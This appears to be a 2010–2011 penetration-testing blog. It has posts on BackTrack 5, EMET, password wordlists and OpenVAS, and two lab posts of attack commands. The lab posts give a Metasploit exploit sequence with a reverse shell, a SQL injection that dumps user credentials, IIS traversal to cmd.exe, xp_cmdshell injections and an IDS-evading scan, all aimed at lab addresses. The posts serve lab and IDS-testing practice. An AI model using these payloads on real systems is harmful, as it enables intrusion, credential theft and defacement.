Monday, May 30, 2011

BackTrack 5

BackTrack 5 released on May 11.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.

BackTrack 5 comes in several flavours and architectures. VM & ISO come with KDE & GNOME flavors.


Visit http://www.backtrack-linux.org/downloads/ to download your preferable flavor.
Posted by at 1 comment:

Saturday, April 30, 2011

Microsoft EMET

The enhanced Mitigation Experience Toolkit (EMET) is designed to help prevent hackers from gaining access to your system.

Software vulnerabilities and exploits have become an everyday part of life. Virtually every product has to deal with them and consequently, users are faced with a stream of security updates. For users who get attacked before the latest updates have been applied or who get attacked before an update is even available, the results can be devastating: malware, loss of PII, etc.

Download EMET
Posted by at No comments:

Tuesday, March 8, 2011

Wordlists for Password Cracking

For those who are looking for Wordlists for password cracking (dictionary), you can download some good wordlists here:

http://www.outpost9.com/files/WordLists.html
http://wordlist.sourceforge.net/
http://www.openwall.com/passwords/wordlists/

and a password wordlist generator:

http://www.securiteam.com/tools/5ZP0N20GAW.html
Posted by at No comments:

Password Checker

Very good online Password Checkers...

Check this out:

http://www.passwordmeter.com/

and this...

http://www.yetanotherpasswordmeter.com/
Posted by at No comments:

Monday, December 6, 2010

OpenVAS Client & Server Connection

OpenVAS Vulnerability Scanner is one of the world most advanced Open Source vulnerability scanner available today. For some reasons, you might find that the OpenVAS server (openvassd) didn't run properly as expected after loading all plugins.

To check OpenVAS Client & Server connection, we can issue this command:

root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)

OpenVAS server listens on TCP port 9390 by default.
Posted by at 1 comment:

Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
Posted by at 1 comment:

Monday, November 22, 2010

IDS Testing (Samples)

TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254













Posted by at 1 comment:
Subscribe to: Posts (Atom)